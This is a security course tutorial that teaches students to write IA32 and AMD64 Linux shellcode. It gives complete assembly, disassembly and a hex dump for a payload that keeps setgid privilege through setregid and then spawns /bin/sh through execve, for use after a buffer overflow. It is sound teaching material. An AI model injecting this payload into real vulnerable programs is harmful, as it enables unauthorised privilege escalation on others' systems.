# cs4459: Unit3 - Writing Shellcode Tutorial

## Objective

We can now change the control flow of a program by exploiting a buffer overflow vulnerability. So far we could jump into `execute_me()` because the program contained such a function, but what should we do if there is no such function?

The answer is that we can write the code we want to execute, inject it into the program's address space, and then jump to it.

The follow-up question is which code to write. If you can put any code in a program's address space, then you might want to run the following:

```c=
execve("/bin/sh", 0, 0);
// or
system("/bin/sh");
```

Launching a shell (`/bin/sh`, `/bin/bash`, or others) from a program gives you the power to run any command with the privilege inherited from that program (the assignment binary, or the program that you want to attack). The code we will write and use this week is therefore called `Shellcode` (because it runs a shell!).

## Requirement

To run a shell, we need to call `execve("/bin/sh", 0, 0)` as a system call (we could call `system("/bin/sh")`, but we will cover that later). However, just running the shell will not let you keep the effective privilege granted by the setuid/setgid bits; to this end, you should run the following beforehand:

```c=
setregid(getegid(), getegid()); // in case of gid, for our assignments.
setreuid(geteuid(), geteuid()); // in case of uid, for the real attack cases.
```

So our job is to write code that runs:

```c=
setregid(getegid(), getegid());
execve("/bin/sh", 0, 0);
```

## System calls

Fortunately, none of these calls has to be an ordinary library function call. They are implemented in the OS kernel, and we can invoke them directly through system calls. The system call is the primary gateway from user space into the kernel. On IA32 Linux, a system call is made by raising the *software interrupt* `0x80`:

```asm=
// IA32
int $0x80

/* In the AMD64 architecture,
 * this is done by issuing the syscall instruction.
 */
// AMD64 assembly
syscall
```

Then, how can we invoke a specific system call?

## IA32 Syscall

System calls are identified by numbers. You can look up the system call numbers [here][syscalls x86-32_bit]. From the table, we can see that:

```
sys_execve:     0xb
sys_getegid16:  0x32
sys_setregid16: 0x47
```

and the number must be placed in the `%eax` register before invoking the system call. For example, running `getegid()` requires:

```asm=
mov $0x32, %eax; // SYS_getegid
int $0x80;
```

The return value of the system call is stored in the `%eax` register. So after running `int $0x80`, the result (the effective GID) will be in `%eax`.

Next is calling `setregid(getegid(), getegid())`. The syscall takes two arguments, and on x86 Linux the arguments of a system call are passed in the following registers:

```
ebx : 1st argument
ecx : 2nd argument
edx : 3rd argument
esi : 4th argument
edi : 5th argument
```

So to call `setregid(getegid(), getegid())`, we need:

```
eax = 0x47
ebx = egid value
ecx = egid value
```

and we can set this up as follows:

```asm=
mov %eax, %ebx   // set ebx (1st arg) to the returned egid
mov %eax, %ecx   // set ecx (2nd arg) to the returned egid
mov $0x47, %eax  // set eax to $SYS_setregid
int $0x80
```

Now we move on to `execve("/bin/sh", 0, 0)`. First, the syscall number is `0xb (11)`. Both the 2nd and 3rd arguments are zero, so we can handle them easily by setting both `%ecx` and `%edx` to zero.

But what about setting `/bin/sh` for the `%ebx` register? We must store in `%ebx` the memory address at which the string `/bin/sh` is located. Several options exist; here we will build the string on the stack, because the stack is memory we can already write to. One convenient way to do this is to use the `push` instruction, which places a value on top of the stack.

We will push the following values:

```asm=
push $0           // mark the end of string (NULL)
push $0x68732f6e  // push "n/sh"
push $0x69622f2f  // push "//bi"
```

Because x86 pushes values that are *4 bytes wide*, we first pad the string `/bin/sh` (7 bytes) to `//bin/sh` (8 bytes); the extra slash does not change the path. First, we push zero to mark the end of the string. Then we push `0x68732f6e`, which is the string value of `n/sh` (in little endian!). Finally, we push `0x69622f2f`, which is `//bi`. Consequently, starting from the current stack top, the stack holds `//bi`, `n/sh`, `\0`, which reads as the string `//bin/sh\0`.

Then how do we make `%ebx` point to that address? The address of the current stack top is always stored in the `%esp` register. So, just move it into `%ebx`.

In the [shellcode-template], you can edit [shellcode.S] to write the shellcode. To build the code for 32-bit x86 shellcode, you can type:

```bash=
$ make 32
gcc -m32 -c -o shellcode.o shellcode.S &&\
gcc -o shellcode shellcode.o -m32 && \
objcopy -S -O binary -j .text shellcode.o shellcode.bin
```

For 64-bit AMD64 shellcode, you can type:

```bash=
$ make 64
...
```

The template also provides a few convenience commands for inspecting the built code, such as:

```bash=
$ make objdump
```

This will show the opcodes along with your assembly code:

```
shellcode.o:     file format elf32-i386

Disassembly of section .text:
```

```asm=
00000000 <main>:
   0:   b8 32 00 00 00          mov    $0x32,%eax
   5:   cd 80                   int    $0x80
   7:   89 c3                   mov    %eax,%ebx
   9:   89 c1                   mov    %eax,%ecx
   b:   b8 47 00 00 00          mov    $0x47,%eax
  10:   cd 80                   int    $0x80
  12:   b8 0b 00 00 00          mov    $0xb,%eax
  17:   b9 00 00 00 00          mov    $0x0,%ecx
  1c:   ba 00 00 00 00          mov    $0x0,%edx
  21:   6a 00                   push   $0x0
  23:   68 6e 2f 73 68          push   $0x68732f6e
  28:   68 2f 2f 62 69          push   $0x69622f2f
  2d:   89 e3                   mov    %esp,%ebx
  2f:   cd 80                   int    $0x80
```

```bash
$ make dump
```

This will just dump the code as hexadecimal values:

```
00000000: b832 0000 00cd 8089 c389 c1b8 4700 0000  .2..........G...
00000010: cd80 b80b 0000 00b9 0000 0000 ba00 0000  ................
00000020: 006a 0068 6e2f 7368 682f 2f62 6989 e3cd  .j.hn/shh//bi...
00000030: 80
```

```bash
$ ./shellcode
```

Running this will actually execute your code (you should get a new shell with a `$` prompt if you coded it correctly).

## AMD64 Syscall

System calls are identified by numbers. You can look up the system call numbers [here][syscalls x86-64_bit].

:::warning
NOTE: system call numbers differ between 32-bit and 64-bit!!! Argument passing is also different!
:::

The instruction that invokes the system call is different as well:

```asm=
// not the int $0x80!
syscall
```

From the table, we can see that:

```
sys_execve:   59
sys_getegid:  108
sys_setregid: 114
```

and the number must be placed in the `%rax` register before invoking the system call. For example, running `getegid()` requires:

```asm=
mov $108, %rax; // SYS_getegid
syscall;
```

The return value of the system call is stored in the `%rax` register. So after running `syscall`, the result (the effective GID) will be in `%rax`.

Next is calling `setregid(getegid(), getegid())`. The syscall takes two arguments, and on AMD64 Linux the arguments of a system call are passed in the following registers (note that the 4th argument uses `r10`, not `rcx` as in ordinary function calls, because the `syscall` instruction overwrites `rcx`):

```
rdi : 1st argument
rsi : 2nd argument
rdx : 3rd argument
r10 : 4th argument
r8  : 5th argument
r9  : 6th argument
```

So to call `setregid(getegid(), getegid())`, we need:

```
rax = 114
rdi = egid value
rsi = egid value
```

and we can set this up as follows:

```asm=
mov %rax, %rdi  // set rdi (1st arg) to the returned egid
mov %rax, %rsi  // set rsi (2nd arg) to the returned egid
mov $114, %rax  // set rax to $SYS_setregid
syscall
```

Now we move on to `execve("/bin/sh", 0, 0)`. First, the syscall number is `0x3b (59)`. Both the 2nd and 3rd arguments are zero, so we can handle them easily by setting both `%rsi` and `%rdx` to zero. We will again put `//bin/sh` on the stack and make `%rdi` point to it.

However, we need to do this differently than in x86. The reason is that AMD64 has no `push` instruction that takes an 8-byte immediate value.
For immediate values, `push` only accepts 1, 2, or 4 bytes, and a 4-byte immediate is sign-extended to fill an 8-byte stack slot (register pushes are 8 bytes). For instance, if you do this:

```asm=
push $0           // mark the end of string (NULL)
push $0x68732f6e  // push "n/sh"
push $0x69622f2f  // push "//bi"
```

the stack will store `0x0000000069622f2f`, `0x0000000068732f6e`, `0x0000000000000000`. The zero bytes that pad the first slot terminate the string early, so the string will just be `//bi`.

To push an 8-byte value, we need to move it into a register first and then push the register. Do this in the following way:

```asm=
mov $0x68732f6e69622f2f, %rbx
push $0
push %rbx
mov %rsp, %rdi
```

In the shellcode-template (you will have this if you ran 'fetch week3'), you can edit [shellcode.S] to write the shellcode. To build the code, you can type:

```bash
$ make 64
gcc -m64 -c -o shellcode.o shellcode.S
gcc -o shellcode shellcode.o -m64
objcopy -S -O binary -j .text shellcode.o shellcode.bin
```

[syscalls x86-32_bit]:https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86-32_bit "syscalls x86-32_bit"
[syscalls x86-64_bit]:https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86_64-64_bit "syscalls x86-64_bit"
[shellcode-template]:https://xfersh.syssec.org/14uYkU/shellcode-template.tar.bz2 "shellcode-template"
[shellcode.S]: https://codimd.syssec.org/s/KBb3so5cp "shellcode.S"

---

###### tags: `candl`,`cs4459`,`shellcode`